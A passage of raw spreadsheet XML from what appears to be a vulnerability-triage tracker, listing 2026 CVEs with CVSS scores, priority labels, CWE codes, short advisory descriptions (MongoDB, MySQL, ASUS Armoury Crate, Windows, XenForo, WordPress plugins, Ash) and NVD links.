r="M1802" s="5" t="inlineStr" /><c r="N1802" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1802" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1802" s="5" t="inlineStr" /><c r="Q1802" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="R1802" s="5" t="inlineStr"><is><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is></c><c r="S1802" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78622</t></is></c></row><row r="1803"><c r="A1803" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1803" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1803" s="5" t="inlineStr"><is><t>CVE-2026-82056</t></is></c><c r="D1803" s="5" t="n"><v>6</v></c><c r="E1803" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1803" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1803" s="5" t="inlineStr" /><c r="H1803" s="5" t="n"><v>0.002</v></c><c r="I1803" s="5" t="inlineStr" /><c r="J1803" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1803" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1803" s="5" t="inlineStr" /><c r="M1803" s="5" t="inlineStr" /><c r="N1803" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1803" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1803" s="5" t="inlineStr" /><c r="Q1803" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1803" s="5" t="inlineStr"><is><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is></c><c r="S1803" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82056</t></is></c></row><row r="1804"><c r="A1804" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1804" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1804" s="5" t="inlineStr"><is><t>CVE-2026-82063</t></is></c><c r="D1804" s="5" t="n"><v>6</v></c><c r="E1804" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1804" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1804" s="5" t="inlineStr" /><c r="H1804" s="5" t="n"><v>0.003</v></c><c r="I1804" s="5" t="inlineStr" /><c r="J1804" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1804" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1804" s="5" t="inlineStr" /><c r="M1804" s="5" t="inlineStr" /><c r="N1804" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1804" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1804" s="5" t="inlineStr" /><c r="Q1804" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1804" s="5" t="inlineStr"><is><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is></c><c r="S1804" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82063</t></is></c></row><row r="1805"><c r="A1805" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1805" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1805" s="5" t="inlineStr"><is><t>CVE-2026-16004</t></is></c><c r="D1805" s="5" t="n"><v>5.9</v></c><c r="E1805" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1805" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1805" s="5" t="inlineStr" /><c r="H1805" s="5" t="n"><v>0.001</v></c><c r="I1805" s="5" t="inlineStr" /><c r="J1805" s="5" t="inlineStr" /><c r="K1805" s="5" t="inlineStr" /><c r="L1805" s="5" t="inlineStr" /><c r="M1805" s="5" t="inlineStr" /><c r="N1805" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1805" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1805" s="5" t="inlineStr" /><c r="Q1805" s="5" t="inlineStr"><is><t>CWE-782</t></is></c><c r="R1805" s="5" t="inlineStr"><is><t>Exposed IOCTL with Insufficient Access Control in Armoury Crate driver allows a local user to read and write arbitrary PCI/PCIe configuration space via crafted IOCTL requests by bypassing the driver's verification.
Refer to the '
Security Update for Armoury Crate App' section on the ASUS Security Advisory for more information.</t></is></c><c r="S1805" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16004</t></is></c></row><row r="1806"><c r="A1806" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1806" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1806" s="5" t="inlineStr"><is><t>CVE-2026-55854</t></is></c><c r="D1806" s="5" t="n"><v>5.9</v></c><c r="E1806" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1806" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1806" s="5" t="inlineStr" /><c r="H1806" s="5" t="n"><v>0.003</v></c><c r="I1806" s="5" t="inlineStr" /><c r="J1806" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K1806" s="5" t="inlineStr" /><c r="L1806" s="5" t="inlineStr" /><c r="M1806" s="5" t="inlineStr" /><c r="N1806" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1806" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P1806" s="5" t="inlineStr" /><c r="Q1806" s="5" t="inlineStr"><is><t>CWE-319, CWE-522</t></is></c><c r="R1806" s="5" t="inlineStr"><is><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is></c><c r="S1806" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55854</t></is></c></row><row r="1807"><c r="A1807" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1807" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1807" s="5" t="inlineStr"><is><t>CVE-2026-55856</t></is></c><c r="D1807" s="5" t="n"><v>5.9</v></c><c r="E1807" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1807" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1807" s="5" t="inlineStr" /><c r="H1807" s="5" t="n"><v>0.002</v></c><c r="I1807" s="5" t="inlineStr" /><c r="J1807" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K1807" s="5" t="inlineStr" /><c r="L1807" s="5" t="inlineStr" /><c r="M1807" s="5" t="inlineStr" /><c r="N1807" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1807" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P1807" s="5" t="inlineStr" /><c r="Q1807" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="R1807" s="5" t="inlineStr"><is><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is></c><c r="S1807" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55856</t></is></c></row><row r="1808"><c r="A1808" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1808" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1808" s="5" t="inlineStr"><is><t>CVE-2026-55857</t></is></c><c r="D1808" s="5" t="n"><v>5.9</v></c><c r="E1808" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1808" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1808" s="5" t="inlineStr" /><c r="H1808" s="5" t="n"><v>0.002</v></c><c r="I1808" s="5" t="inlineStr" /><c r="J1808" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K1808" s="5" t="inlineStr" /><c r="L1808" s="5" t="inlineStr" /><c r="M1808" s="5" t="inlineStr" /><c r="N1808" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1808" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P1808" s="5" t="inlineStr" /><c r="Q1808" s="5" t="inlineStr"><is><t>CWE-319, CWE-522</t></is></c><c r="R1808" s="5" t="inlineStr"><is><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is></c><c r="S1808" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55857</t></is></c></row><row r="1809"><c r="A1809" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1809" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1809" s="5" t="inlineStr"><is><t>CVE-2026-55858</t></is></c><c r="D1809" s="5" t="n"><v>5.9</v></c><c r="E1809" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1809" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1809" s="5" t="inlineStr" /><c r="H1809" s="5" t="n"><v>0.003</v></c><c r="I1809" s="5" t="inlineStr" /><c r="J1809" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K1809" s="5" t="inlineStr" /><c r="L1809" s="5" t="inlineStr" /><c r="M1809" s="5" t="inlineStr" /><c r="N1809" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1809" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P1809" s="5" t="inlineStr" /><c r="Q1809" s="5" t="inlineStr"><is><t>CWE-838</t></is></c><c r="R1809" s="5" t="inlineStr"><is><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is></c><c r="S1809" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55858</t></is></c></row><row r="1810"><c r="A1810" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1810" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1810" s="5" t="inlineStr"><is><t>CVE-2026-55859</t></is></c><c r="D1810" s="5" t="n"><v>5.9</v></c><c r="E1810" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1810" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1810" s="5" t="inlineStr" /><c r="H1810" s="5" t="n"><v>0.003</v></c><c r="I1810" s="5" t="inlineStr" /><c r="J1810" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K1810" s="5" t="inlineStr" /><c r="L1810" s="5" t="inlineStr" /><c r="M1810" s="5" t="inlineStr" /><c r="N1810" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1810" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P1810" s="5" t="inlineStr" /><c r="Q1810" s="5" t="inlineStr"><is><t>CWE-116, CWE-838</t></is></c><c r="R1810" s="5" t="inlineStr"><is><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is></c><c r="S1810" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55859</t></is></c></row><row r="1811"><c r="A1811" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1811" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1811" s="5" t="inlineStr"><is><t>CVE-2026-55860</t></is></c><c r="D1811" s="5" t="n"><v>5.9</v></c><c r="E1811" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1811" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1811" s="5" t="inlineStr" /><c r="H1811" s="5" t="n"><v>0.002</v></c><c r="I1811" s="5" t="inlineStr" /><c r="J1811" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K1811" s="5" t="inlineStr" /><c r="L1811" s="5" t="inlineStr" /><c r="M1811" s="5" t="inlineStr" /><c r="N1811" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1811" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P1811" s="5" t="inlineStr" /><c r="Q1811" s="5" t="inlineStr"><is><t>CWE-319, CWE-522</t></is></c><c r="R1811" s="5" t="inlineStr"><is><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is></c><c r="S1811" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55860</t></is></c></row><row r="1812"><c r="A1812" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1812" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1812" s="5" t="inlineStr"><is><t>CVE-2026-69304</t></is></c><c r="D1812" s="5" t="n"><v>5.9</v></c><c r="E1812" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1812" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1812" s="5" t="inlineStr" /><c r="H1812" s="5" t="n"><v>0.008</v></c><c r="I1812" s="5" t="inlineStr" /><c r="J1812" s="5" t="inlineStr" /><c r="K1812" s="5" t="inlineStr" /><c r="L1812" s="5" t="inlineStr" /><c r="M1812" s="5" t="inlineStr" /><c r="N1812" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1812" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1812" s="5" t="inlineStr" /><c r="Q1812" s="5" t="inlineStr"><is><t>CWE-409</t></is></c><c r="R1812" s="5" t="inlineStr"><is><t>Improper handling of highly compressed data (data amplification) in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1812" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69304</t></is></c></row><row r="1813"><c r="A1813" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1813" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1813" s="5" t="inlineStr"><is><t>CVE-2026-69382</t></is></c><c r="D1813" s="5" t="n"><v>5.9</v></c><c r="E1813" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1813" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1813" s="5" t="inlineStr" /><c r="H1813" s="5" t="n"><v>0.004</v></c><c r="I1813" s="5" t="inlineStr" /><c r="J1813" s="5" t="inlineStr" /><c r="K1813" s="5" t="inlineStr" /><c r="L1813" s="5" t="inlineStr" /><c r="M1813" s="5" t="inlineStr" /><c r="N1813" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1813" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1813" s="5" t="inlineStr" /><c r="Q1813" s="5" t="inlineStr"><is><t>CWE-327</t></is></c><c r="R1813" s="5" t="inlineStr"><is><t>Use of a broken or risky cryptographic algorithm in Microsoft Exchange Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1813" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69382</t></is></c></row><row r="1814"><c r="A1814" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1814" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1814" s="5" t="inlineStr"><is><t>CVE-2026-70091</t></is></c><c r="D1814" s="5" t="n"><v>5.9</v></c><c r="E1814" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1814" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1814" s="5" t="inlineStr" /><c r="H1814" s="5" t="n"><v>0.007</v></c><c r="I1814" s="5" t="inlineStr" /><c r="J1814" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1814" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1814" s="5" t="inlineStr" /><c r="M1814" s="5" t="inlineStr" /><c r="N1814" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1814" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1814" s="5" t="inlineStr" /><c r="Q1814" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="R1814" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows DNS allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1814" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70091</t></is></c></row><row r="1815"><c r="A1815" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1815" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C1815" s="5" t="inlineStr"><is><t>CVE-2026-71493</t></is></c><c r="D1815" s="5" t="n"><v>5.9</v></c><c r="E1815" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1815" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G1815" s="5" t="inlineStr" /><c r="H1815" s="5" t="n"><v>0.004</v></c><c r="I1815" s="5" t="inlineStr" /><c r="J1815" s="5" t="inlineStr" /><c r="K1815" s="5" t="inlineStr" /><c r="L1815" s="5" t="inlineStr"><is><t>go:github.com/infracost/infracost</t></is></c><c r="M1815" s="5" t="inlineStr"><is><t>0.10.45</t></is></c><c r="N1815" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O1815" s="5" t="inlineStr" /><c r="P1815" s="5" t="inlineStr" /><c r="Q1815" s="5" t="inlineStr"><is><t>CWE-22, CWE-59</t></is></c><c r="R1815"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S1815" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71493</t></is></c></row><row r="1816"><c r="A1816" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1816" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C1816" s="5" t="inlineStr"><is><t>CVE-2026-71494</t></is></c><c r="D1816" s="5" t="n"><v>5.9</v></c><c r="E1816" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1816" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G1816" s="5" t="inlineStr" /><c r="H1816" s="5" t="n"><v>0.004</v></c><c r="I1816" s="5" t="inlineStr" /><c r="J1816" s="5" t="inlineStr" /><c r="K1816" s="5" t="inlineStr" /><c r="L1816" s="5" t="inlineStr"><is><t>go:github.com/infracost/infracost</t></is></c><c r="M1816" s="5" t="inlineStr"><is><t>0.10.45</t></is></c><c r="N1816" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O1816" s="5" t="inlineStr" /><c r="P1816" s="5" t="inlineStr" /><c r="Q1816" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="R1816"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S1816" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71494</t></is></c></row><row r="1817"><c r="A1817" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1817" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1817" s="5" t="inlineStr"><is><t>CVE-2026-72978</t></is></c><c r="D1817" s="5" t="n"><v>5.9</v></c><c r="E1817" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1817" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1817" s="5" t="inlineStr" /><c r="H1817" s="5" t="n"><v>0.008</v></c><c r="I1817" s="5" t="inlineStr" /><c r="J1817" s="5" t="inlineStr" /><c r="K1817" s="5" t="inlineStr" /><c r="L1817" s="5" t="inlineStr" /><c r="M1817" s="5" t="inlineStr" /><c r="N1817" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1817" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1817" s="5" t="inlineStr" /><c r="Q1817" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="R1817" s="5" t="inlineStr"><is><t>Allocation of resources without limits or throttling in Active Directory Federation Services (AD FS) allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1817" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72978</t></is></c></row><row r="1818"><c r="A1818" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1818" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1818" s="5" t="inlineStr"><is><t>CVE-2026-73310</t></is></c><c r="D1818" s="5" t="n"><v>5.9</v></c><c r="E1818" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1818" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1818" s="5" t="inlineStr" /><c r="H1818" s="5" t="n"><v>0.004</v></c><c r="I1818" s="5" t="inlineStr" /><c r="J1818" s="5" t="inlineStr" /><c r="K1818" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L1818" s="5" t="inlineStr" /><c r="M1818" s="5" t="inlineStr" /><c r="N1818" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1818" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1818" s="5" t="inlineStr" /><c r="Q1818" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R1818" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains an authorization flaw in the OAuth2 token endpoint that allows attackers controlling any allowlisted redirect URI to bypass redirect URI binding by submitting a different allowlisted URI than the one recorded at authorization time. Attackers can exchange an intercepted authorization code using a mismatched redirect URI to steal OAuth2 tokens from intercepted authorization flows.</t></is></c><c r="S1818" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73310</t></is></c></row><row r="1819"><c r="A1819" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1819" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1819" s="5" t="inlineStr"><is><t>CVE-2026-75809</t></is></c><c r="D1819" s="5" t="n"><v>5.9</v></c><c r="E1819" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1819" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1819" s="5" t="inlineStr" /><c r="H1819" s="5" t="n"><v>0.001</v></c><c r="I1819" s="5" t="inlineStr" /><c r="J1819" s="5" t="inlineStr" /><c r="K1819" s="5" t="inlineStr" /><c r="L1819" s="5" t="inlineStr" /><c r="M1819" s="5" t="inlineStr" /><c r="N1819" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1819" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1819" s="5" t="inlineStr" /><c r="Q1819" s="5" t="inlineStr"><is><t>CWE-782</t></is></c><c r="R1819" s="5" t="inlineStr"><is><t>Exposed IOCTL with insufficient access control in ASUS Armoury Crate allows a local user to disclosure information and disabling device functionality by bypassing driver authentication and using IOCTLs to read from and write to PCIe configuration space.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="S1819" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75809</t></is></c></row><row r="1820"><c r="A1820" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1820" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1820" s="5" t="inlineStr"><is><t>CVE-2026-78620</t></is></c><c r="D1820" s="5" t="n"><v>5.9</v></c><c r="E1820" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1820" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1820" s="5" t="inlineStr" /><c r="H1820" s="5" t="n"><v>0.003</v></c><c r="I1820" s="5" t="inlineStr" /><c r="J1820" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1820" s="5" t="inlineStr" /><c r="L1820" s="5" t="inlineStr" /><c r="M1820" s="5" t="inlineStr" /><c r="N1820" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1820" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1820" s="5" t="inlineStr" /><c r="Q1820" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="R1820" s="5" t="inlineStr"><is><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is></c><c r="S1820" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78620</t></is></c></row><row r="1821"><c r="A1821" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1821" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1821" s="5" t="inlineStr"><is><t>CVE-2026-80438</t></is></c><c r="D1821" s="5" t="n"><v>5.9</v></c><c r="E1821" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1821" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1821" s="5" t="inlineStr" /><c r="H1821" s="5" t="n"><v>0.001</v></c><c r="I1821" s="5" t="inlineStr" /><c r="J1821" s="5" t="inlineStr" /><c r="K1821" s="5" t="inlineStr" /><c r="L1821" s="5" t="inlineStr" /><c r="M1821" s="5" t="inlineStr" /><c r="N1821" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1821" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1821" s="5" t="inlineStr" /><c r="Q1821" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R1821" s="5" t="inlineStr"><is><t>The Ninja Forms  WordPress plugin before 3.15.2 does not restrict its REST abilities to administrators, accepting a Ninja Forms  WordPress plugin before 3.15.2-specific capability as equivalent to full site administration, which allows any user granted that capability to read Ninja Forms  WordPress plugin before 3.15.2 settings and stored form submissions, overwrite the Ninja Forms  WordPress plugin before 3.15.2's configuration, and create or modify arbitrary posts and pages.
The capability belongs to no default WordPress role and the Ninja Forms  WordPress plugin before 3.15.2 never grants it, so an administrator must have assigned it, typically when delegating access to the form builder.</t></is></c><c r="S1821" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80438</t></is></c></row><row r="1822"><c r="A1822" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1822" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1822" s="5" t="inlineStr"><is><t>CVE-2026-81347</t></is></c><c r="D1822" s="5" t="n"><v>5.9</v></c><c r="E1822" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1822" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1822" s="5" t="inlineStr" /><c r="H1822" s="5" t="n"><v>0.002</v></c><c r="I1822" s="5" t="inlineStr" /><c r="J1822" s="5" t="inlineStr" /><c r="K1822" s="5" t="inlineStr" /><c r="L1822" s="5" t="inlineStr" /><c r="M1822" s="5" t="inlineStr" /><c r="N1822" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1822" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1822" s="5" t="inlineStr" /><c r="Q1822" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="R1822" s="5" t="inlineStr"><is><t>The Frontend Admin by DynamiApps WordPress plugin before 3.29.13 does not properly validate a user-controllable directory path before deleting files within it, allowing unauthenticated attackers to delete index.php and .htaccess files outside the intended directory, including the WordPress root, which can render the site inoperable. Successful exploitation requires a non-default form configuration.</t></is></c><c r="S1822" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81347</t></is></c></row><row r="1823"><c r="A1823" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1823" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1823" s="5" t="inlineStr"><is><t>CVE-2026-82752</t></is></c><c r="D1823" s="5" t="n"><v>5.9</v></c><c r="E1823" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1823" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G1823" s="5" t="inlineStr" /><c r="H1823" s="5" t="n"><v>0.001</v></c><c r="I1823" s="5" t="inlineStr" /><c r="J1823" s="5" t="inlineStr" /><c r="K1823" s="5" t="inlineStr" /><c r="L1823" s="5" t="inlineStr" /><c r="M1823" s="5" t="inlineStr" /><c r="N1823" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1823" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1823" s="5" t="inlineStr" /><c r="Q1823" s="5" t="inlineStr"><is><t>CWE-1284</t></is></c><c r="R1823" s="5" t="inlineStr"><is><t>Improper Validation of Specified Quantity in Input vulnerability in ash-project ash allows an attacker to store a value of arbitrary size in an attribute whose length constraint should bound it.

Ash measures string length with Elixir's String.length/1, which counts Unicode graphemes, in the max_length and min_length constraints of Ash.Type.String (apply_constraints/2 in lib/ash/type/string.ex), in Ash.Resource.Validation.StringLength, and in the string_length expression function. A grapheme carries an unbounded number of combining marks, so a base character followed by a million combining acute accents is one grapheme and megabytes of data, and satisfies max_length: 2. Where the data layer imposes no independent limit (ETS, Mnesia, or a Postgres text column) the whole value is persisted, so an attacker can write an entire request body into an attribute declared with a small maximum and grow storage without bound.

The counting unit also disagrees with the storage layer, which counts codepoints rather than graphemes, so a value accepted by the constraint can still be rejected or truncated by the column. A Postgres varchar(n) column bounds the value itself and is not exposed.

This issue affects ash: from 0.10.0 before 3.33.0.</t></is></c><c r="S1823" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82752</t></is></c></row><row r="1824"><c r="A1824" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1824" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1824" s="5" t="inlineStr"><is><t>CVE-2026-84185</t></is></c><c r="D1824" s="5" t="n"><v>5.9</v></c><c r="E1824" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1824" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1824" s="5" t="inlineStr" /><c r="H1824" s="5" t="n"><v>0.001</v></c><c r="I1824" s="5" t="inlineStr" /><c r="J1824" s="5" t="inlineStr" /><c r="K1824" s="5" t="inlineStr" /><c r="L1824" s="5" t="inlineStr" /><c r="M1824" s="5" t="inlineStr" /><c r="N1824" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1824" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1824" s="5" t="inlineStr" 